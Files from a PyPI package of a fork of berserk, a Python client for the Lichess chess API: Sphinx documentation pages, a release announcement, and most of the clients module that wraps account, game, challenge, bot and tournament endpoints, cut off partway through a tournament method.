:target: https://pypi.python.org/pypi/berserk
:alt: Available on PyPI
.. image:: https://img.shields.io/travis/rhgrant10/berserk.svg
:target: https://travis-ci.org/rhgrant10/berserk
:alt: Continuous Integration
.. image:: https://codecov.io/gh/rhgrant10/tsplib95/branch/master/graph/badge.svg
:target: https://codecov.io/gh/rhgrant10/tsplib95
:alt: Code Coverage
.. image:: https://readthedocs.org/projects/berserk/badge/?version=latest
:target: https://berserk.readthedocs.io/en/latest/?badge=latest
:alt: Documentation Status
Python client for the `Lichess API`_.
.. _Lichess API: https://lichess.org/api
----
.. toctree::
:maxdepth: 4
readme
installation
usage
api
contributing
authors
history
Indices and tables
==================
* :ref:`genindex`
* :ref:`modindex`
* :ref:`search`
| zack-berserk | /zack-berserk-0.11.1.tar.gz/zack-berserk-0.11.1/docs/index.rst | index.rst |
.. highlight:: shell
Installation
============
Stable release
--------------
To install berserk, run this command in your terminal:
.. code-block:: console
$ pip install berserk
This is the preferred method to install berserk, as it will always install the most recent stable release.
If you don't have `pip`_ installed, this `Python installation guide`_ can guide
you through the process.
.. _pip: https://pip.pypa.io
.. _Python installation guide: http://docs.python-guide.org/en/latest/starting/installation/
From sources
------------
The sources for berserk can be downloaded from the `Github repo`_.
You can either clone the public repository:
.. code-block:: console
$ git clone git://github.com/rhgrant10/berserk
Or download the `tarball`_:
.. code-block:: console
$ curl -OL https://github.com/rhgrant10/berserk/tarball/master
Once you have a copy of the source, you can install it with:
.. code-block:: console
$ python setup.py install
.. _Github repo: https://github.com/rhgrant10/berserk
.. _tarball: https://github.com/rhgrant10/berserk/tarball/master
| zack-berserk | /zack-berserk-0.11.1.tar.gz/zack-berserk-0.11.1/docs/installation.rst | installation.rst |
Developer Interface
===================
Clients
-------
.. automodule:: berserk.clients
:members:
:undoc-members:
:show-inheritance:
Session
-------
.. automodule:: berserk.session
:members:
:undoc-members:
:show-inheritance:
Enums
-----
.. automodule:: berserk.enums
:members:
:undoc-members:
:inherited-members:
:show-inheritance:
Formats
-------
.. automodule:: berserk.formats
:members:
:undoc-members:
:show-inheritance:
Exceptions
----------
.. automodule:: berserk.exceptions
:members:
:undoc-members:
:show-inheritance:
Utils
-----
.. automodule:: berserk.utils
:members:
| zack-berserk | /zack-berserk-0.11.1.tar.gz/zack-berserk-0.11.1/docs/api.rst | api.rst |
Hi everyone,
I'm pleased to announce the release of berserk v0.7.0!
What's New?
-----------
It's been a while since the last slew of commits and lots has happened since v0.3.2:
**Features**
* Add ``ApiError`` for all other request errors
* Add ``ResponseError`` for 4xx and 5xx responses with status code, reason, and cause
* Add a utility for easily converting API objects into update params
* Add logging to the ``berserk.session`` module
* Add new ``Teams`` client: join, get members, kick member, and leave
* Add simuls
* Add studies export and export chapter
* Add support for the broadcast endpoints
* Add tests for all utils
* Add tournament results, games export, and list by creator
* Add user followers, users following, rating history, and puzzle activity
**Deprecations**
* Deprecated ``Users.get_by_team`` - use ``Teams.get_members`` instead
**Bugfixes**
* Fix bug in ``Broadcasts.push_pgn_update``
* Fix exception message when no cause
* Fix multiple bugs with the tournament create endpoint
* Fix py36 issue preventing successful build
* Fix test case broken by 0.4.0 release
* Fix multiple bugs in ``Tournaments.export_games``
**Misc**
* Update development status classifier to 4 - Beta
* Update documentation and tweak the theme
* Update the travis build to include py37
* Update the Makefile
What is berserk?
----------------
berserk is the Python client for the Lichess API. It supports JSON and PGN,
provides pluggable session auth, and implements most if not all of the API.
License: GNU General Public License v3
* Read the **docs**: https://berserk.readthedocs.io/
* Install from **PyPI**: https://pypi.org/project/berserk/
* Contribute **source**: https://github.com/rhgrant10/berserk
Example
-------
.. code-block:: python
>>> import berserk
>>> session = berserk.TokenSession('my-api-token')
>>> client = berserk.Client(session)
>>> my = client.account.get()
>>> games = list(client.games.export_by_player(my['username'], as_pgn=True))
>>> len(games)
18
Enjoy!
-- Rob
| zack-berserk | /zack-berserk-0.11.1.tar.gz/zack-berserk-0.11.1/docs/announcing.rst | announcing.rst |
from time import time as now
import requests
from deprecated import deprecated
from .session import Requestor
from .formats import JSON, LIJSON, PGN, NDJSON, TEXT
from . import models
__all__ = [
'Client',
'Account',
'Board',
'Bots',
'Broadcasts',
'Challenges',
'Games',
'Simuls',
'Studies',
'Teams',
'Tournaments',
'Users',
]
# Base URL for the API
API_URL = 'https://lichess.org/'
class BaseClient:
def __init__(self, session, base_url=None):
self._r = Requestor(session, base_url or API_URL, default_fmt=JSON)
class FmtClient(BaseClient):
"""Client that can return PGN or not.
:param session: request session, authenticated as needed
:type session: :class:`requests.Session`
:param str base_url: base URL for the API
:param bool pgn_as_default: ``True`` if PGN should be the default format
for game exports when possible. This defaults
to ``False`` and is used as a fallback when
``as_pgn`` is left as ``None`` for methods that
support it.
"""
def __init__(self, session, base_url=None, pgn_as_default=False):
super().__init__(session, base_url)
self.pgn_as_default = pgn_as_default
def _use_pgn(self, as_pgn=None):
# helper to merge default with provided arg
return as_pgn if as_pgn is not None else self.pgn_as_default
class Client(BaseClient):
"""Main touchpoint for the API.
All endpoints are namespaced into the clients below:
- :class:`account <berserk.clients.Account>` - managing account information
- :class:`bots <berserk.clients.Bots>` - performing bot operations
- :class:`broadcasts <berserk.clients.Broadcasts>` - getting and creating
broadcasts
- :class:`challenges <berserk.clients.Challenges>` - using challenges
- :class:`games <berserk.clients.Games>` - getting and exporting games
- :class:`simuls <berserk.clients.Simuls>` - getting simultaneous
exhibition games
- :class:`studies <berserk.clients.Studies>` - exporting studies
- :class:`teams <berserk.clients.Teams>` - getting information about teams
- :class:`tournaments <berserk.clients.Tournaments>` - getting and
creating tournaments
- :class:`users <berserk.clients.Users>` - getting information about users
:param session: request session, authenticated as needed
:type session: :class:`requests.Session`
:param str base_url: base API URL to use (if other than the default)
:param bool pgn_as_default: ``True`` if PGN should be the default format
for game exports when possible. This defaults
to ``False`` and is used as a fallback when
``as_pgn`` is left as ``None`` for methods that
support it.
"""
def __init__(self, session=None, base_url=None, pgn_as_default=False):
session = session or requests.Session()
super().__init__(session, base_url)
self.account = Account(session, base_url)
self.users = Users(session, base_url)
self.teams = Teams(session, base_url)
self.games = Games(session, base_url, pgn_as_default=pgn_as_default)
self.challenges = Challenges(session, base_url)
self.board = Board(session, base_url)
self.bots = Bots(session, base_url)
self.tournaments = Tournaments(session, base_url,
pgn_as_default=pgn_as_default)
self.broadcasts = Broadcasts(session, base_url)
self.simuls = Simuls(session, base_url)
self.studies = Studies(session, base_url)
class Account(BaseClient):
"""Client for account-related endpoints."""
def get(self):
"""Get your public information.
:return: public information about the authenticated user
:rtype: dict
"""
path = 'api/account'
return self._r.get(path, converter=models.Account.convert)
def get_email(self):
"""Get your email address.
:return: email address of the authenticated user
:rtype: str
"""
path = 'api/account/email'
return self._r.get(path)['email']
def get_preferences(self):
"""Get your account preferences.
:return: preferences of the authenticated user
:rtype: dict
"""
path = 'api/account/preferences'
return self._r.get(path)['prefs']
def get_kid_mode(self):
"""Get your kid mode status.
:return: current kid mode status
:rtype: bool
"""
path = 'api/account/kid'
return self._r.get(path)['kid']
def set_kid_mode(self, value):
"""Set your kid mode status.
:param bool value: whether to enable or disable kid mode
:return: success
:rtype: bool
"""
path = 'api/account/kid'
params = {'v': value}
return self._r.post(path, params=params)['ok']
def upgrade_to_bot(self):
"""Upgrade your account to a bot account.
Requires bot:play oauth scope. User cannot have any previously played
games.
:return: success
:rtype: bool
"""
path = 'api/bot/account/upgrade'
return self._r.post(path)['ok']
class Users(BaseClient):
"""Client for user-related endpoints."""
def get_puzzle_activity(self, max=None):
"""Stream puzzle activity history starting with the most recent.
:param int max: maximum number of entries to stream
:return: puzzle activity history
:rtype: iter
"""
path = 'api/user/puzzle-activity'
params = {'max': max}
return self._r.get(path, params=params, fmt=NDJSON, stream=True,
converter=models.PuzzleActivity.convert)
def get_realtime_statuses(self, *user_ids):
"""Get the online, playing, and streaming statuses of players.
Only id and name fields are returned for offline users.
:param user_ids: one or more user IDs (names)
:return: statuses of given players
:rtype: list
"""
path = 'api/users/status'
params = {'ids': ','.join(user_ids)}
return self._r.get(path, params=params)
def get_all_top_10(self):
"""Get the top 10 players for each speed and variant.
:return: top 10 players in each speed and variant
:rtype: dict
"""
path = 'player'
return self._r.get(path, fmt=LIJSON)
def get_leaderboard(self, perf_type, count=10):
"""Get the leaderboard for one speed or variant.
:param perf_type: speed or variant
:type perf_type: :class:`~berserk.enums.PerfType`
:param int count: number of players to get
:return: top players for one speed or variant
:rtype: list
"""
path = f'player/top/{count}/{perf_type}'
return self._r.get(path, fmt=LIJSON)['users']
def get_public_data(self, username):
"""Get the public data for a user.
:param str username: username
:return: public data available for the given user
:rtype: dict
"""
path = f'api/user/{username}'
return self._r.get(path, converter=models.User.convert)
def get_activity_feed(self, username):
"""Get the activity feed of a user.
:param str username: username
:return: activity feed of the given user
:rtype: list
"""
path = f'api/user/{username}/activity'
return self._r.get(path, converter=models.Activity.convert)
def get_by_id(self, *usernames):
"""Get multiple users by their IDs.
:param usernames: one or more usernames
:return: user data for the given usernames
:rtype: list
"""
path = 'api/users'
return self._r.post(path, data=','.join(usernames),
converter=models.User.convert)
@deprecated(version='0.7.0', reason='use Teams.get_members(id) instead')
def get_by_team(self, team_id):
"""Get members of a team.
:param str team_id: ID of a team
:return: users on the given team
:rtype: iter
"""
path = f'api/team/{team_id}/users'
return self._r.get(path, fmt=NDJSON, stream=True,
converter=models.User.convert)
def get_live_streamers(self):
"""Get basic information about currently streaming users.
:return: users currently streaming a game
:rtype: list
"""
path = 'streamer/live'
return self._r.get(path)
def get_users_followed(self, username):
"""Stream users followed by a user.
:param str username: a username
:return: iterator over the users the given user follows
:rtype: iter
"""
path = f'/api/user/{username}/following'
return self._r.get(path, stream=True, fmt=NDJSON,
converter=models.User.convert)
def get_users_following(self, username):
"""Stream users who follow a user.
:param str username: a username
:return: iterator over the users that follow the given user
:rtype: iter
"""
path = f'/api/user/{username}/followers'
return self._r.get(path, stream=True, fmt=NDJSON,
converter=models.User.convert)
def get_rating_history(self, username):
"""Get the rating history of a user.
:param str username: a username
:return: rating history for all game types
:rtype: list
"""
path = f'/api/user/{username}/rating-history'
return self._r.get(path, converter=models.RatingHistory.convert)
class Teams(BaseClient):
def get_members(self, team_id):
"""Get members of a team.
:param str team_id: ID of a team
:return: users on the given team
:rtype: iter
"""
path = f'api/team/{team_id}/users'
return self._r.get(path, fmt=NDJSON, stream=True,
converter=models.User.convert)
def join(self, team_id):
"""Join a team.
:param str team_id: ID of a team
:return: success
:rtype: bool
"""
path = f'/team/{team_id}/join'
return self._r.post(path)['ok']
def leave(self, team_id):
"""Leave a team.
:param str team_id: ID of a team
:return: success
:rtype: bool
"""
path = f'/team/{team_id}/quit'
return self._r.post(path)['ok']
def kick_member(self, team_id, user_id):
"""Kick a member out of your team.
:param str team_id: ID of a team
:param str user_id: ID of a team member
:return: success
:rtype: bool
"""
path = f'/team/{team_id}/kick/{user_id}'
return self._r.post(path)['ok']
class Games(FmtClient):
"""Client for games-related endpoints."""
def export(self, game_id, as_pgn=None, moves=None, tags=None, clocks=None,
evals=None, opening=None, literate=None):
"""Get one finished game as PGN or JSON.
:param str game_id: the ID of the game to export
:param bool as_pgn: whether to return the game in PGN format
:param bool moves: whether to include the PGN moves
:param bool tags: whether to include the PGN tags
:param bool clocks: whether to include clock comments in the PGN moves
:param bool evals: whether to include analysis evaluation comments in
the PGN moves when available
:param bool opening: whether to include the opening name
:param bool literate: whether to include literate the PGN
:return: exported game, as JSON or PGN
"""
path = f'game/export/{game_id}'
params = {
'moves': moves,
'tags': tags,
'clocks': clocks,
'evals': evals,
'opening': opening,
'literate': literate,
}
fmt = PGN if self._use_pgn(as_pgn) else JSON
return self._r.get(path, params=params, fmt=fmt,
converter=models.Game.convert)
def export_by_player(self, username, as_pgn=None, since=None, until=None,
max=None, vs=None, rated=None, perf_type=None,
color=None, analysed=None, moves=None, tags=None,
evals=None, opening=None):
"""Get games by player.
:param str username: which player's games to return
:param bool as_pgn: whether to return the game in PGN format
:param int since: lowerbound on the game timestamp
:param int until: upperbound on the game timestamp
:param int max: limit the number of games returned
:param str vs: filter by username of the opponent
:param bool rated: filter by game mode (``True`` for rated, ``False``
for casual)
:param perf_type: filter by speed or variant
:type perf_type: :class:`~berserk.enums.PerfType`
:param color: filter by the color of the player
:type color: :class:`~berserk.enums.Color`
:param bool analysed: filter by analysis availability
:param bool moves: whether to include the PGN moves
:param bool tags: whether to include the PGN tags
:param bool clocks: whether to include clock comments in the PGN moves
:param bool evals: whether to include analysis evaluation comments in
the PGN moves when available
:param bool opening: whether to include the opening name
:param bool literate: whether to include literate the PGN
:return: iterator over the exported games, as JSON or PGN
"""
path = f'api/games/user/{username}'
params = {
'since': since,
'until': until,
'max': max,
'vs': vs,
'rated': rated,
'perfType': perf_type,
'color': color,
'analysed': analysed,
'moves': moves,
'tags': tags,
'evals': evals,
'opening': opening,
}
fmt = PGN if self._use_pgn(as_pgn) else NDJSON
yield from self._r.get(path, params=params, fmt=fmt, stream=True,
converter=models.Game.convert)
def export_multi(self, *game_ids, as_pgn=None, moves=None, tags=None,
clocks=None, evals=None, opening=None):
"""Get multiple games by ID.
:param game_ids: one or more game IDs to export
:param bool as_pgn: whether to return the game in PGN format
:param bool moves: whether to include the PGN moves
:param bool tags: whether to include the PGN tags
:param bool clocks: whether to include clock comments in the PGN moves
:param bool evals: whether to include analysis evaluation comments in
the PGN moves when available
:param bool opening: whether to include the opening name
:return: iterator over the exported games, as JSON or PGN
"""
path = 'games/export/_ids'
params = {
'moves': moves,
'tags': tags,
'clocks': clocks,
'evals': evals,
'opening': opening,
}
payload = ','.join(game_ids)
fmt = PGN if self._use_pgn(as_pgn) else NDJSON
yield from self._r.post(path, params=params, data=payload, fmt=fmt,
stream=True, converter=models.Game.convert)
def get_among_players(self, *usernames):
"""Get the games currently being played among players.
Note this will not includes games where only one player is in the given
list of usernames.
:param usernames: two or more usernames
:return: iterator over all games played among the given players
"""
path = 'api/stream/games-by-users'
payload = ','.join(usernames)
yield from self._r.post(path, data=payload, fmt=NDJSON, stream=True,
converter=models.Game.convert)
# move this to Account?
def get_ongoing(self, count=10):
"""Get your currently ongoing games.
:param int count: number of games to get
:return: some number of currently ongoing games
:rtype: list
"""
path = 'api/account/playing'
params = {'nb': count}
return self._r.get(path, params=params)['nowPlaying']
def get_tv_channels(self):
"""Get basic information about the best games being played.
:return: best ongoing games in each speed and variant
:rtype: dict
"""
path = 'tv/channels'
return self._r.get(path)
class Challenges(BaseClient):
def create(self, username, rated, clock_limit=None, clock_increment=None,
days=None, color=None, variant=None, position=None):
"""Challenge another player to a game.
:param str username: username of the player to challege
:param bool rated: whether or not the game will be rated
:param int clock_limit: clock initial time (in seconds)
:param int clock_increment: clock increment (in seconds)
:param int days: days per move (for correspondence games; omit clock)
:param color: color of the accepting player
:type color: :class:`~berserk.enums.Color`
:param variant: game variant to use
:type variant: :class:`~berserk.enums.Variant`
:param position: custom intial position in FEN (variant must be
standard and the game cannot be rated)
:type position: str
:return: challenge data
:rtype: dict
"""
path = f'api/challenge/{username}'
payload = {
'rated': rated,
'clock.limit': clock_limit,
'clock.increment': clock_increment,
'days': days,
'color': color,
'variant': variant,
'fen': position,
}
return self._r.post(path, json=payload,
converter=models.Tournament.convert)
def create_with_accept(self, username, rated, token, clock_limit=None,
clock_increment=None, days=None, color=None,
variant=None, position=None):
"""Start a game with another player.
This is just like the regular challenge create except it forces the
opponent to accept. You must provide the OAuth token of the opponent
and it must have the challenge:write scope.
:param str username: username of the opponent
:param bool rated: whether or not the game will be rated
:param str token: opponent's OAuth token
:param int clock_limit: clock initial time (in seconds)
:param int clock_increment: clock increment (in seconds)
:param int days: days per move (for correspondence games; omit clock)
:param color: color of the accepting player
:type color: :class:`~berserk.enums.Color`
:param variant: game variant to use
:type variant: :class:`~berserk.enums.Variant`
:param position: custom intial position in FEN (variant must be
standard and the game cannot be rated)
:type position: :class:`~berserk.enums.Position`
:return: game data
:rtype: dict
"""
path = f'api/challenge/{username}'
payload = {
'rated': rated,
'acceptByToken': token,
'clock.limit': clock_limit,
'clock.increment': clock_increment,
'days': days,
'color': color,
'variant': variant,
'fen': position,
}
return self._r.post(path, json=payload,
converter=models.Tournament.convert)
def create_ai(self, level=8, clock_limit=None, clock_increment=None,
days=None, color=None, variant=None, position=None):
"""Challenge AI to a game.
:param int level: level of the AI (1 to 8)
:param int clock_limit: clock initial time (in seconds)
:param int clock_increment: clock increment (in seconds)
:param int days: days per move (for correspondence games; omit clock)
:param color: color of the accepting player
:type color: :class:`~berserk.enums.Color`
:param variant: game variant to use
:type variant: :class:`~berserk.enums.Variant`
:param position: use one of the custom initial positions (variant must
be standard and cannot be rated)
:type position: str
:return: success indicator
:rtype: bool
"""
path = "api/challenge/ai"
payload = {
'level': level,
'clock.limit': clock_limit,
'clock.increment': clock_increment,
'days': days,
'color': color,
'variant': variant,
'fen': position,
}
return self._r.post(path, json=payload,
converter=models.Tournament.convert)
def create_open(self, clock_limit=None, clock_increment=None,
variant=None, position=None):
"""Create a challenge that any two players can join.
:param int clock_limit: clock initial time (in seconds)
:param int clock_increment: clock increment (in seconds)
:param variant: game variant to use
:type variant: :class:`~berserk.enums.Variant`
:param position: custom intial position in FEN (variant must be
standard and the game cannot be rated)
:type position: str
:return: challenge data
:rtype: dict
"""
path = "api/challenge/open"
payload = {
'clock.limit': clock_limit,
'clock.increment': clock_increment,
'variant': variant,
'fen': position,
}
return self._r.post(path, json=payload,
converter=models.Tournament.convert)
def accept(self, challenge_id):
"""Accept an incoming challenge.
:param str challenge_id: id of the challenge to accept
:return: success indicator
:rtype: bool
"""
path = f'api/challenge/{challenge_id}/accept'
return self._r.post(path)['ok']
def decline(self, challenge_id):
"""Decline an incoming challenge.
:param str challenge_id: id of the challenge to decline
:return: success indicator
:rtype: bool
"""
path = f'api/challenge/{challenge_id}/decline'
return self._r.post(path)['ok']
class Board(BaseClient):
"""Client for physical board or external application endpoints."""
def stream_incoming_events(self):
"""Get your realtime stream of incoming events.
:return: stream of incoming events
:rtype: iterator over the stream of events
"""
path = 'api/stream/event'
yield from self._r.get(path, stream=True)
def seek(self, time, increment, rated=False, variant='standard',
color='random', rating_range=None):
"""Create a public seek to start a game with a random opponent.
:param int time: intial clock time in minutes
:param int increment: clock increment in minutes
:param bool rated: whether the game is rated (impacts ratings)
:param str variant: game variant to use
:param str color: color to play
:param rating_range: range of opponent ratings
:return: duration of the seek
:rtype: float
"""
if isinstance(rating_range, (list, tuple)):
low, high = rating_range
rating_range = f'{low}-{high}'
path = '/api/board/seek'
payload = {
'rated': str(bool(rated)).lower(),
'time': time,
'increment': increment,
'variant': variant,
'color': color,
'ratingRange': rating_range or '',
}
# we time the seek
start = now()
# just keep reading to keep the search going
for line in self._r.post(path, data=payload, fmt=TEXT, stream=True):
pass
# and return the time elapsed
return now() - start
def stream_game_state(self, game_id):
"""Get the stream of events for a board game.
:param str game_id: ID of a game
:return: iterator over game states
"""
path = f'api/board/game/stream/{game_id}'
yield from self._r.get(path, stream=True,
converter=models.GameState.convert)
def make_move(self, game_id, move):
"""Make a move in a board game.
:param str game_id: ID of a game
:param str move: move to make
:return: success
:rtype: bool
"""
path = f'api/board/game/{game_id}/move/{move}'
return self._r.post(path)['ok']
def post_message(self, game_id, text, spectator=False):
"""Post a message in a board game.
:param str game_id: ID of a game
:param str text: text of the message
:param bool spectator: post to spectator room (else player room)
:return: success
:rtype: bool
"""
path = f'api/board/game/{game_id}/chat'
room = 'spectator' if spectator else 'player'
payload = {'room': room, 'text': text}
return self._r.post(path, json=payload)['ok']
def abort_game(self, game_id):
"""Abort a board game.
:param str game_id: ID of a game
:return: success
:rtype: bool
"""
path = f'api/board/game/{game_id}/abort'
return self._r.post(path)['ok']
def resign_game(self, game_id):
"""Resign a board game.
:param str game_id: ID of a game
:return: success
:rtype: bool
"""
path = f'api/board/game/{game_id}/resign'
return self._r.post(path)['ok']
def handle_draw_offer(self, game_id, accept):
"""Create, accept, or decline a draw offer.
To offer a draw, pass ``accept=True`` and a game ID of an in-progress
game. To response to a draw offer, pass either ``accept=True`` or
``accept=False`` and the ID of a game in which you have recieved a
draw offer.
Often, it's easier to call :func:`offer_draw`, :func:`accept_draw`, or
:func:`decline_draw`.
:param str game_id: ID of an in-progress game
:param bool accept: whether to accept
:return: True if successful
:rtype: bool
"""
accept = "yes" if accept else "no"
path = f'/api/board/game/{game_id}/draw/{accept}'
return self._r.post(path)['ok']
def offer_draw(self, game_id):
"""Offer a draw in the given game.
:param str game_id: ID of an in-progress game
:return: True if successful
:rtype: bool
"""
return self.handle_draw_offer(game_id, True)
def accept_draw(self, game_id):
"""Accept an already offered draw in the given game.
:param str game_id: ID of an in-progress game
:return: True if successful
:rtype: bool
"""
return self.handle_draw_offer(game_id, True)
def decline_draw(self, game_id):
"""Decline an already offered draw in the given game.
:param str game_id: ID of an in-progress game
:return: True if successful
:rtype: bool
"""
return self.handle_draw_offer(game_id, False)
class Bots(BaseClient):
"""Client for bot-related endpoints."""
def stream_incoming_events(self):
"""Get your realtime stream of incoming events.
:return: stream of incoming events
:rtype: iterator over the stream of events
"""
path = 'api/stream/event'
yield from self._r.get(path, stream=True)
def stream_game_state(self, game_id):
"""Get the stream of events for a bot game.
:param str game_id: ID of a game
:return: iterator over game states
"""
path = f'api/bot/game/stream/{game_id}'
yield from self._r.get(path, stream=True,
converter=models.GameState.convert)
def make_move(self, game_id, move):
"""Make a move in a bot game.
:param str game_id: ID of a game
:param str move: move to make
:return: success
:rtype: bool
"""
path = f'api/bot/game/{game_id}/move/{move}'
return self._r.post(path)['ok']
def post_message(self, game_id, text, spectator=False):
"""Post a message in a bot game.
:param str game_id: ID of a game
:param str text: text of the message
:param bool spectator: post to spectator room (else player room)
:return: success
:rtype: bool
"""
path = f'api/bot/game/{game_id}/chat'
room = 'spectator' if spectator else 'player'
payload = {'room': room, 'text': text}
return self._r.post(path, json=payload)['ok']
def abort_game(self, game_id):
"""Abort a bot game.
:param str game_id: ID of a game
:return: success
:rtype: bool
"""
path = f'api/bot/game/{game_id}/abort'
return self._r.post(path)['ok']
def resign_game(self, game_id):
"""Resign a bot game.
:param str game_id: ID of a game
:return: success
:rtype: bool
"""
path = f'api/bot/game/{game_id}/resign'
return self._r.post(path)['ok']
def accept_challenge(self, challenge_id):
"""Accept an incoming challenge.
:param str challenge_id: ID of a challenge
:return: success
:rtype: bool
"""
path = f'api/challenge/{challenge_id}/accept'
return self._r.post(path)['ok']
def decline_challenge(self, challenge_id):
"""Decline an incoming challenge.
:param str challenge_id: ID of a challenge
:return: success
:rtype: bool
"""
path = f'api/challenge/{challenge_id}/decline'
return self._r.post(path)['ok']
class Tournaments(FmtClient):
"""Client for tournament-related endpoints."""
def get(self):
"""Get recently finished, ongoing, and upcoming tournaments.
:return: current tournaments
:rtype: list
"""
path = 'api/tournament'
return self._r.get(path, converter=models.Tournaments.convert_values)
@deprecated(version='0.11.0', reason='use Tournaments.create_arena or Tournaments.create_swiss instead')
def create(self, clock_time, clock_increment, minutes, name=None,
wait_minutes=None, variant=None, berserkable=None, rated=None,
start_date=None, position=None, password=None, conditions=None):
"""Create a new tournament.
.. note::
``wait_minutes`` is always relative to now and is overriden by
``start_time``.
.. note::
If ``name`` is left blank then one is automatically created.
:param int clock_time: intial clock time in minutes
:param int clock_increment: clock increment in seconds
:param int minutes: length of the tournament in minutes
:param str name: tournament name
:param int wait_minutes: future start time in minutes
:param str start_date: when to start the tournament
:param str variant: variant to use if other than standard
:param bool rated: whether the game affects player ratings
:param str berserkable: whether players can use berserk
:param str position: custom initial position in FEN
:param str password: password (makes the tournament private)
:param dict conditions: conditions for participation
:return: created tournament info
:rtype: dict
"""
path = 'api/tournament'
payload = {
'name': name,
'clockTime': clock_time,
'clockIncrement': clock_increment,
'minutes': minutes,
'waitMinutes': wait_minutes,
'startDate': start_date,
'variant': variant,
'rated': rated,
'position': position,
'berserkable': berserkable,
'password': password,
**{f'conditions.{c}': v for c, v in (conditions or {}).items()},
}
return self._r.post(path, json=payload,
converter=models.Tournament.convert)
def create_arena(self, clock_time, clock_increment, minutes, name=None,
wait_minutes=None, start_date=None, variant=None,
rated=None, position=None, berserkable=None,
streakable=None, hasChat=None, description=None,
password=None, teambBattleByTeam=None, teamId=None,
minRating=None, maxRating=None, nbRatedGame=None):
"""Create a new arena tournament.
.. note::
``wait_minutes`` is always relative to now and is overriden by
``start_time``.
.. note::
If ``name`` is left blank then one is automatically created.
:param int clock_time: initial clock time in minutes
:param int clock_increment: clock increment in seconds
:param int minutes: length of the tournament in minutes
:param str name: tournament name
:param int wait_minutes: future start time in minutes
:param str start_date: when to start the tournament
:param str variant: variant to use if other than standard
:param bool rated: whether the game affects player ratings
:param str position: custom initial position in FEN
:param str berserkable: whether players can use berserk
:param bool streakable: whether players get streaks
:param bool hasChat: whether players can
discuss in a chat
:param string description: anything you want to
tell players about the tournament
:param str password: password
:param str teambBattleByTeam: Id of a team you lead
to create a team battle
:param string teamId: Restrict entry to members of team
:param int minRating: Minimum rating to join
:param int maxRating: Maximum rating to join
:param int nbRatedGame: Min number of rated games required
:return: created tournament info
:rtype: dict
"""
path = 'api/tournament'
payload = {
'name': name,
'clockTime': clock_time,
'clockIncrement': clock_increment,
'minutes': minutes,
'waitMinutes': wait_minutes,
'startDate': start_date,
'variant': variant,
'rated': rated,
'position': position,
'berserkable': berserkable,
'streakable': streakable,
'hasChat': hasChat,
'description': description,
'password': password,
'teambBattleByTeam': teambBattleByTeam,
'conditions.teamMember.teamId': teamId,
'conditions.minRating.rating': minRating,
'conditions.maxRating.rating': maxRating,
'conditions.nbRatedGame.nb': nbRatedGame
}
return self._r.post(path, json=payload,
converter=models.Tournament.convert)
def create_swiss(self, teamId_, clock_limit, clock_increment, nbRounds,
name=None, startsAt=None, roundInterval=None,
variant=None, description=None, rated=None, chatFor=None):
"""Create a new swiss tournament
.. note::
If ``name`` is left blank then one is automatically created.
.. note::
If ``startsAt`` is left blank then the
tournament begins 10 minutes after creation
:param string teamId_: team Id, required for swiss tournaments
:param int clock_limit: initial clock time in seconds
:param int clock_increment: clock increment in seconds
:param int nbRounds: maximum number of rounds to play
:param string name: tournament name
:param int startsAt: when to start tournament, in ms timestamp
:param int roundInterval: interval between rounds in seconds
:param string variant: variant to use if other than standard
:param string description: tournament description
:param bool rated: whether the game affects player ratings
:param int chatFor: who can read and write in the chat
:return: created tournament info
:rtype: dict
"""
path = f'api/swiss/new/{teamId_}'
payload = {
'name': name,
'clock.limit': clock_limit,
'clock.increment': clock_increment,
'nbRounds': nbRounds,
'startsAt': startsAt,
'roundInterval': roundInterval,
'variant': variant,
'description': description,
'rated': rated,
'chatFor': chatFor
}
return self._r.post(path, json=payload,
converter=models.Tournament.convert)
@deprecated(version='0.11.0', reason='use Tournaments.export_arena_games or Tournaments.export_swiss_games')
def export_games(self, id_, as_pgn=False, moves=None, tags=None,
clocks=None, evals=None, opening=None):
"""Export games from a tournament.
:param str id_: tournament ID
:param bool as_pgn: whether to return PGN instead of JSON
:param bool moves: include moves
:param bool tags: include tags
:param bool clocks: include clock comments in the PGN moves, when
available
:param bool evals: include analysis evalulation comments in the PGN
moves, when available
:param bool opening: include the opening name
:return: games
:rtype: list
"""
path = f'api/tournament/{id_}/games'
params = {
'moves': moves,
'tags': tags,
'clocks': clocks,
'evals': evals,
'opening': opening,
}
fmt = PGN if self._use_pgn(as_pgn) else NDJSON
return self._r.get(path, params=params, fmt=fmt,
converter=models.Game.convert)
def export_arena_games(self, id_, as_pgn=False, moves=None, tags=None,
clocks=None, evals=None, opening=None):
"""Export games from a arena tournament.
:param str id_: tournament ID
:param bool as_pgn: whether to return PGN instead of JSON
:param bool moves: include moves
:param bool tags: include tags
:param bool clocks: include clock comments in the PGN moves, when
available
:param bool evals: include analysis evalulation comments in the PGN
moves, when available
:param bool opening: include the opening name
:return: games
:rtype: list
"""
path = f'api/tournament/{id_}/games'
params = {
'moves': moves,
'tags': tags,
'clocks': clocks,
'evals': evals,
'opening': opening,
}
fmt = PGN if self._use_pgn(as_pgn) else NDJSON
return self._r.get(path, params=params, fmt=fmt,
converter=models.Game.convert)
def export_swiss_games(self, id_, as_pgn=False, moves=None, pgnInJson=None,
tags=None, clocks=None, evals=None, opening=None):
"""Export games from a swiss tournament
:param str id_: tournament id
:param bool as_pgn: whether to return pgn instead of JSON
:param bool moves: include moves
:param bool pgnInJson: include the full PGN within the
JSON response, in a pgn field
:param bool tags: include tags
:param bool clocks: include clock comments
:param bool evals: include analysis evaluation
comments in the PGN, when available
:param bool opening: include the opening name
:return: games
:rtype: list
"""
path = f'api/swiss/{id_}/games'
params = {
'moves:': moves,
'pgnInJson': pgnInJson,
'tags': tags,
'clocks': clocks,
'evals': evals,
'opening': opening,
}
fmt = PGN if self._use_pgn(as_pgn) else NDJSON
return self._r.get(path, params=params, fmt=fmt,
converter=models.Game.convert)
def tournaments_by_user(self, username, nb=None, as_pgn=False):
"""Get tournaments created by a user
:param string username: username
:param int nb: max number of tournaments to fetch
:param bool as_pgn: whether to return pgn instead of Json
:return: tournaments
:rtype: list
"""
path = f'api/user/{username}/tournament/created'
params = {
'nb': nb,
}
fmt = PGN if self._use_pgn(as_pgn) else NDJSON
return self._r.get(path, params=params, fmt=fmt,
converter=models.Game.convert)
def arenas_by_team(self, teamId, maxT=None, as_pgn=False):
"""Get arenas created for a team
:param string teamId: Id of the team
:param int maxT: how many tournaments to download
:param bool as_pgn: whether to return pgn instead of Json
:return: tournaments
:rtype: list
"""
path = f'api/team/{teamId}/arena'
params = {
'max': maxT,
}
fmt = PGN if self._use_pgn(as_pgn) else NDJSON
